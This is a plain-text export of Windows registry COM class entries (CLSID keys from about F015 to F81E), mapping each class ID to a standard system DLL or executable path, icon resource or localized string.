HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F0152790-D56E-4445-850E-4F3117DB740C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\remotepg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F020E586-5264-11d1-A532-0000F8757D7E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F022A390-2F1E-44d2-AA0A-0FEB28AE6517}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dxp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F0285374-DFF1-11D3-B433-00C04F8ECD78}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C} InfoTip REG_EXPAND_SZ @%systemroot%\system32\NetworkExplorer.dll,-2 LocalizedString REG_EXPAND_SZ @%systemroot%\system32\NetworkExplorer.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-25 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\NetworkExplorer.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F033F90C-548B-44C3-97A8-B434096FF876}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F04C3F9B-20B3-40E1-A824-3A41FE3D7931}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DscCoreConfProv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F04CC277-03A2-4277-96A9-77967471BDFF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F052299C-6DA4-40f0-BE0D-8BD02FAD080A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f079ec7c-11a4-4c33-87fa-090d19772fac}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rastlsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f07f3920-7b8c-11cf-9be8-00aa004b9986}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\OffFilt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F0A3A195-8D6A-4BC7-BD1F-3B2A2D5807CA}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f0ae1542-f497-484b-a175-a20db09144ba}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F0B1E31E-4FE1-49F5-84BC-4BA007655288}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f0ce6592-5bce-41cc-bf2d-ec4f3f55e711}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F0DB4512-0E25-4A1F-A88B-8FF40351BFCD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F1171280-BC35-45d1-8F53-8AB833267899}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dnshc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F1184172-589C-4ECA-B2C8-F330C903A76F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F1390A9A-A3F4-4E5D-9C5F-98F3BD8D935C} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\SyncCenter.dll,-6121 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F1390A9A-A3F4-4E5D-9C5F-98F3BD8D935C}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll,-1000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F1390A9A-A3F4-4E5D-9C5F-98F3BD8D935C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F159A1A7-462A-4FF3-8E51-E518DC011268}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\cfmifs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F1E752C3-FD72-11D0-AEF6-00C04FB6DD2C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F1EFACAA-08A1-461B-9D28-7AA8947889A0}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\SyncHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f1f72421-6433-4de9-982d-c8dc12cb569c}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F20487CC-FC04-4B1E-863F-D9801796130B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F20DA720-C02F-11CE-927B-0800095AE340} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\packager.dll,-2000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F20DA720-C02F-11CE-927B-0800095AE340}\AuxUserType\2 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\packager.dll,-3000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F20DA720-C02F-11CE-927B-0800095AE340}\AuxUserType\3 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\packager.dll,-3000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F20DA720-C02F-11CE-927B-0800095AE340}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\packager.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F20DA720-C02F-11CE-927B-0800095AE340}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\packager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F20DA720-C02F-11CE-927B-0800095AE340}\verb\0 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\packager.dll,-3017 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F20DA720-C02F-11CE-927B-0800095AE340}\verb\1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\packager.dll,-3018 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2102C37-90C3-450C-B3F6-92BE1693BDF2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wscisvif.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F22D2A32-F1F4-4D62-AF5E-E5E8253AC6A6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ShareHost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f235ce7d-b143-4d4f-ad93-64e48d53a5fb}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2472B49-5214-4D3A-A662-04F09250D694}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlandlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2506CD7-82C2-43D9-A1D3-F85F5EFE7D09}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {F2506CD7-82C2-43D9-A1D3-F85F5EFE7D09} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f26a669a-bcbb-4e37-abf9-7325da15f931}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f270c64a-ffb8-4ae4-85fe-3a75e5347966}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f29f4028-86d2-4b45-84ec-858dc97a123e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\vss_ps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f2c3faae-c8ac-11d0-bcdb-00c04fd8d5b6}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsprop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\mmsys.cpl,-301#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\mmsys.cpl,-300#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\mmsys.cpl,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f2ed4d41-11cb-4fe4-bd48-b90f2b0f46bd}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2FC5C3B-FC71-452c-AB56-47BC0873E46D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F31091EA-B0A8-11D6-B6FC-005056C00008}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\AdvancedInstallers\cmiv2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemess.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3199DD9-A65C-4E4C-9B25-6E9997AAE1D1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3364BA0-65B9-11CE-A9BA-00AA004AE837}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3368374-CF19-11d0-B93D-00A0C90312e1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F375FDC3-9DB0-4927-A84A-FC1215B3570F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F37C5810-4D3F-11d0-B4BF-00AA00BBB723}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rshx32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3BDFAD3-F276-49e9-9B17-C474F48F0764}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WinSATAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3C502D1-96DE-4623-B22C-8373FC803AB4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WiredNetworkCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3C633A2-46C8-498E-8FBB-CC6F721BBCDE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f3cc4ca3-22c2-40ec-ac3c-89d8a43373b0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f3d06e7c-1e45-4a26-847e-f9fcdee59be0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3D3F924-11FC-11D3-BB97-00C04F8EE6C0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f407d01a-0bcb-4591-9bd6-ea4a71df0799}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\IME\IMETC\IMTCCORE.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f4086d4e-2e05-428b-92de-87d8d0bb4262}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\pnrphc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F42F750A-64A8-4190-951D-C6F7EF4E4BA1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F43E8166-162C-4B12-8C2B-510D21516082}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\netswitchteamcim.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F440168E-A06A-4C25-B6EB-01705985E826}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\BrowserSettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F4477AD6-6B3A-411b-9ECC-7CE89B665401}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\coredpus.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F46316E4-FB1B-46eb-AEDF-9520BFBB916A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F4655419-DAF2-42ab-9178-3B6AC903170C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WLanHC.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f4be747e-45c4-4701-90f1-d49d9ac30248} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\diagperf.dll,-401 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f4be747e-45c4-4701-90f1-d49d9ac30248}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\System32\PerfCenterCPL.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f4be747e-45c4-4701-90f1-d49d9ac30248}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\diagperf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f4e8bc67-9616-4a28-a332-cf27a5ca6736}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F19-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F27-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F31-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F33-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F34-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F35-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F36-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F37-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F39-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F3F-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F40-C551-11D3-89B9-0000F81FE221}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F40-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5078F41-C551-11D3-89B9-0000F81FE221}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f507f854-308b-401e-a1b7-b55ba6ba679a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F54309BB-0AFA-4BE0-B6D9-810F01F4DEE6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F55C5B4C-517D-11D1-AB57-00C04FD9159E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\ntevt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Actioncenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f580a09b-ea6e-4d83-9a03-add6cb756ab3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F582A54C-90D3-45b3-9860-EE3143AA85A0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5A55D36-8750-432C-AB52-AD49A016EABC}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiprvsd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f5a8b627-4d46-4d65-92f3-73626ae31971}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5B63656-069D-4E80-B4FD-9E0DB16604D8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\upnphost.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5BC0AF0-63FC-468F-BC6F-D63EAE129A33}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f5d121ed-c8ac-11d0-bcdb-00c04fd8d5b6}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsprop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f5d121ee-c8ac-11d0-bcdb-00c04fd8d5b6}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsprop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f5d121ef-c8ac-11d0-bcdb-00c04fd8d5b6}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsprop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f5d121f0-c8ac-11d0-bcdb-00c04fd8d5b6}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsprop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f5d121f3-c8ac-11d0-bcdb-00c04fd8d5b6}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsprop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f5d121f4-c8ac-11d0-bcdb-00c04fd8d5b6}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsprop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5D3E63B-CB0F-4628-A478-6D8244BE36B1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5F75737-2843-4F22-933D-C76A97CDA62F}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmidcprv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f60163ce-2b8d-458d-ab2c-40f215767514}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F60C3E02-214A-462b-9B07-56EA38545A13}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6166DAD-D3BE-4ebd-8419-9B5EAD8D0EC7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F61FFEC1-754F-11d0-80CA-00AA005B4383}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f6b13ba7-d626-45e5-82c5-26e596114dc0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fphc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6B6E965-E9B2-444B-9286-10C9152EDBC5} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\fhcpl.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\fhcpl.dll,-52#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6B6E965-E9B2-444B-9286-10C9152EDBC5}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\FileHistory.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6B6E965-E9B2-444B-9286-10C9152EDBC5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6B6E965-E9B2-444B-9286-10C9152EDBC5}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\fhcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6BEC032-233E-4B58-BEE9-DE13942BF136}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\lltdapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6C3AC3E-E642-4795-A9F2-9B3AB94EAC5D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F12-9C73-11D3-B32E-00C04F990BB4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F14-9C73-11D3-B32E-00C04F990BB4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6F05056-37FA-4DAF-8A51-40A8F14E0F62}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f7300245-1f4b-41ba-8948-6fd392064494}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\winrssrv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F778C6B4-C08B-11D2-976C-00C04F79DB19}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\els.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F77C0A7D-7395-45c5-BDFC-B096BF6C4DA0}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\BWContextHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F79A6BF9-7415-4CF3-AE10-4559509ABC3C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F7A4F1DA-96C3-4BCF-BEB3-1D9FFDE89EE9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F7B9271E-46D8-4B6A-B5CF-E6A4F7F49732}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Engines\SR\spsreng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F7ECB841-7EB6-41EB-BAEA-E2145F7348C6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dot3conn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F7FE6BA6-9441-49E8-858F-936D8E774A2D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeploymentCsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F7FF39BA-FA79-11E4-87DA-8F461D5D46B0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f81b1b56-7613-4ee4-bc05-1fab5de5c07e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmp4srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f81e9010-6ea4-11ce-a7ff-00aa003ca9f6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll 